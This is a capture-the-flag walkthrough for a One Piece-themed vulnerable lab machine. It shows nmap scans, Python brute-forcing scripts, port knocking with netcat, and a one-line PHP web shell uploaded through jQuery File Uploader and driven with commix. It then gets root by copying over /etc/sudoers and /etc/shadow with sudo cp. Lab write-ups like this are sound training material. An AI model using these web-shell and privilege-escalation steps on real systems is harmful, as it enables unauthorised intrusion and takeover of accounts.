One Piece CTF
https://drive.google.com/file/d/1EUZnLexBzcDPUeRhfV3POU_H-FV-Eksd/view?usp=sharing
2 <= x <= 8 hours
Note: This is just a rough estimation. Some people may done it faster, Some people may done it slower.
- Apache2 Options +Indexes
- Anonymous FTP
- Anonymous Samba
- Port Knocking
- PHP disabled functions was not configured
- Bad Permission configured (e.g. CHMOD 777)
- Plain text password used in command line
- Linux (Ubuntu 14.04+)
- Windows XP
- NMAP
- Netcat
- Web Browser (with JavaScript enabled)
- Python
- Git
- SSH
- Postman
- Web Shell
- DirBuster
- BurpSuite
- Escalation Scripts / Toolkits
- nmap
- nc --verbose 10414
- http:27777
- directories and files scanning
- Manually DNS configuration (Host file)
- grandline.htb:27777
- members.grandline.htb:27777
- Anonymous FTP
- Hidden Files
- Zipped file with password
- Anonymous Network File Sharing (SMB)
- QR code
- http:80
- The Firewall
- Connection Refused, Rejected with flag
- Port Knocking
- jQuery Files Uploader*
- Reverse Shell Injection
- PHP executable shell
- commix (for executing reverse shell)
- Environment Scanning
- Scan users
- Scan user's files and permission
- Get user's password (frankin)
- Privilege Escalation
- Modifying
/etc/sudoersusing the available executable command - Modifying
/etc/shadowby patching hash password - sudo
- Modifying
- Capture The Flag
- Locate the flag
- By determining process
- By locate or find command
- Locate the flag
The victim machine was protected by a Firewall rule
-A INPUT -p tcp -m tcp --dport 80 -j REJECT --reject-with icmp-port-unreachable
But has Port Knocking configured to disable that Firewall rule
[options]
logfile = /var/log/knockd.log
[openSSH]
sequence = 193,550,478
seq_timeout = 20
command = /sbin/iptables -D INPUT -p tcp --dport 80 -j REJECT
tcpflags = syn
| Sequence | Port Number | Where to Find | How to obtain |
|---|---|---|---|
| Key 1 | 193 | members.grandline.htb/bookie1223sa.txt | 48 columns per line |
| Key 2 | 550 | ftp://anonymous@ip/enieslobby/.onepiece.zip/3.jpg | Unzip by using password alabasta from nc -v VICTIM_IP 10414 |
| Key 3 | 478 | smb://sambashared/2/qr code na ja | Scan the QR code |
Sudoer #1 = franky; Password = 3d2yhijinbe; Executable Command = /bin/cp
Sudoer #2 = tester; Executable Command = /bin/bash
Flag path = /root/flag.txt
Run nmap
nmap -sS -T4 -A -p- VICTIM_IP
There is something exposed in port 10414, That is
KEY:alabasta
And the available services are
| Port | Service | Status |
|---|---|---|
| 21 | FTP | Open |
| 22 | SSH | Open |
| 80 | HTTP | Filtered |
| 445 | SMB | Open |
| 2049 | NFS | Open |
| 10414 | Open | |
| 27777 | HTTP | Open |
Proceed these following steps:
- Request index.php to see what's inside.
- directories and files scanning
- Manually DNS configuration (Host file)
- grandline.htb:27777
- members.grandline.htb:27777
Good Luck, Your brain will be fucked soon!
You will find a simple HTML document. And there seems to have nothing.
Ok, Don't give up. Let's do dictionary attack. See Files and Directories Scanning in the next section.
A python script has been used. The script read every lines in wordlist.txt (each line has only one word), then concatenate with file extensions. Then the requests were made by using requests module. Successfully requests will be printed.
#!/usr/bin/python3
import requests
target = "TARGET_IP:PORT" # REPLACE TARGET_IP WITH YOUR TARGET IP
words = open("wordlist.txt", "r")
for word in words:
for extension in ["", "php", "html"]:
r = requests.get(target+'/'+word.strip()+'.'+extension)
if r.status_code == 200:
print("/"+word.strip()+"."+extension)
/
/index.php
/ziggy.php
Document needed.
Luckily, This Apache2 server was configured with Options +Indexes. We can see any files in a directory.
decode.txt shown up.
Found BrainFuck code, Let's run or compile it using online compiler.
# BrainFuck code
+++++ +++++ [->++ +++++ +++<] >+++. <+++[ ->+++ <]>++ .<+++ +[->- ---<]
>-.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .++++ ++++. ---.+ ++++. -----
----. <++++ +++[- >---- ---<] >---- --.<+ +++++ +[->+ +++++ +<]>+ +++++
+++.< +++[- >+++< ]>+++ .<+++ +[->- ---<] >--.<
grandline.htb
Could it be a DNS record?
The record was added to host file (in Linux, /etc/hosts)
TARGET_IP grandline.htb
Replace TARGET_IP with the target ip address (e.g. 192.168.122.100).
The response body changed. There is an additional image and a missing JavaScript file has been loaded together.
<img src="fox1.jpg">
<script src="http://members.grandline.htb/js/script.js"></script>
Update DNS record again, For members.grandline.htb
Found a simple web application. There is a form. Just fill the form!
The only thing that can be done here is Guessing every characters in One Piece.
Make a word list from https://onepiece.fandom.com/wiki/List_of_Canon_Characters
Add id="characters" into <table>
let names = $("#characters").children("tbody").children("tr").children("td:nth-child(2)")
let makeWordList = (myList) => {
let word = ""
for(i=0; i<myList.length; i++)
word += (myList[i].innerText + "\n")
return word
}
let wordList = makeWordList(names)
console.log(wordList)
A.O
Abdullah
Absalom
Acilia
Adele
Aggie 68
.
.
.
Foxy
.
.
.
If it is a correct guessing, The response body will be different.
#!/usr/bin/python3
import requests
target = "http://members.grandline.htb:27777" # REPLACE TARGET_IP WITH YOUR TARGET IP
words = open("onepieceCharacterList.txt", "r")
# Config Response Body Size Here
previousResponseBodySize = # You can obtain this value by using len(requests.get(target).text)
for word in words:
r = requests.post(target, data = {'char': word.strip(), 'submit': 'submit'})
if r.status_code == 200:
if len(r.text) != previousResponseBodySize:
print(word.strip())
Document needed.
Additional HTML code was in the response body.
Correct
<meta http-equiv="refresh" content="30;url=/bookie1223sa.txt">
We found something, Is there a key here?
Hint: [ 24 x 48 ]
24 lines, 48 characters per line. (Greyscale Image in a nutshell)
KEY
IS
193
- Access to FTP with anonymouse user
- List all files and directories (including hidden items)
- Found
enieslobby/.onepiece.zip, Extract this file with passwordalabasta(The password exposed inport 10414) - View Images Metadata using Exif
- Found a key
SECRET{KEY2} = 550
- Mount SMB (Windows XP has been used in the operation)
- Go to
sambashared/2folder. - You will found a QR code (filename
qr code na ja) - Scan it
KEY3 = 478
After severals nmap attempts, we found that port 80 was accidentally opened. Why...? Port knocking can be a possible action, because the port sequence was configured to 193, 550, 487. Then after the nmap ran serveral times, The sequence is valid
First nmap: 193 and 550 was knocked as a sequence
Second nmap: 487 was knocked as a sequence
NetCat method
$ nc -v TARGET_IP 193
$ nc -v TARGET_IP 550
$ nc -v TARGET_IP 478
Knockd method
# apt install knockd -y
$ knockd TARGET_IP 193 550 478
Then, The firewall goes down and port 80 is now accessible.
In this step, we can upload a backdoor script.
Found an open-source web application
jQuery-File-Uploader
- Default PHP configuration allows the executable script to call system commands.
- Allowed file types is not configured.
The link below is a powerful web shell. You can upload this file directly via jQuery File Uploader. https://github.com/flozz/p0wny-shell/blob/master/shell.php
Or, Manual mathod, One line of PHP code together with commix can open a reverse shell for you.
shell.php
<?php echo exec($_GET['cmd']) ?>;
According to the open-source and its documentation, The default
upload_diris located at./server/php/files
https://github.com/commixproject/commix
python3 commix.py http://grandline.htb/jQuery-File-Uploader/server/php/files/shell.php?cmd=whoami
Now, we have shell access.
You can use automated tools, by uploading one of these scripts in the link below. Run the script, wait for the scanning done. https://netsec.ws/?p=309&fbclid=IwAR0X9bFcC4VRO7CfMjsJRQEMzr19GcUXi_n3lUyfMy8Nv0Y3MdwyUEDOk9U
Or Let's walkthrough manually.
$ whoami
> www-data
[www-data]$ pwd
> /var/www/phpmail
[www-data]$ cat /etc/passwd
> root:!:
> ...
> tester:$6$...
> john:$6$...
> loki:$6$...
> franky:$6$
[www-data]$ ls -la /home/*
> /home/franky
> -rwxrwxrwx .bash_history
Nani??? Permission was set to 777
[www-data]$ cat /home/franky/.bash_history
> ...
> echo 3d2yhijinbe > realpassword.txt
> ...
Nani??? Why use password in command line like this!
[me@localhost]$ ssh franky@...
Password: 3d2yhijinbe
[franky@ubuntu]$ sudo -l
> /bin/cp
[franky@ubuntu]$ sudo cp
cp: Missing Operands
[franky@ubuntu]$ pwd
> /home/franky
[franky@ubuntu]$ touch sudoers_Im_Coming
[franky@ubuntu]$ sudo cp /etc/sudoers ~/sudoers_Im_Coming
[franky@ubuntu]$ ls -l sudoers*
> rwxr-xr-x franky franky sudoers_Im_Coming
[franky@ubuntu]$ vi sudoers*
ViM screen
...
root ALL=(ALL:ALL)
franky ... :NOPASSWORD /bin/cp # Change /bin/cp to /bin/bash
...
:wq
[franky@ubuntu]$ sudo -s
[root@ubuntu]#
[franky@ubuntu]$ cat /etc/group | grep sudo
> sudo:x:27:tester
[franky@ubuntu]$ touch my_shadow
[franky@ubuntu]$ sudo cp /etc/shadow my_shadow
[franky@ubuntu]$ vi my_shadow
ViM screen
...
tester:$6$t72esmkL$0jGigluRhSPsvKXttv/KFr66QvrLQNq4A2EkXZFZmSIAhWeLMmQc57uG9K2O14sJoXNdT9MjcvwM53EoBKG0O1:17954:0:99999:7:::
franky:$6$5r7X8q0p$8/mDvW4mkkuXNwmGU78TlE1n3JXf1hHNZwKbZlDjdchRGE.7cRb/IwwclWQtKeWUIR0IMbKzIcY8OIOfOVFhE0:17949:0:99999:7:::
...
:wq
[franky@ubuntu]$ sudo cp -f my_shadow /etc/shadow
[franky@ubuntu]$ su tester
Password: 3d2yhijinbe
[tester@ubuntu]$ sudo -s
Password: 3d2yhijinbe
[root@ubuntu]#
[root@ubuntu]# cd /root
[root@ubuntu]# ls
> rwx------ root root flag.txt
> rwx------ root root smb.conf
[root@ubuntu]# vi flag.txt
Key=alabasta # Change it to whatever you like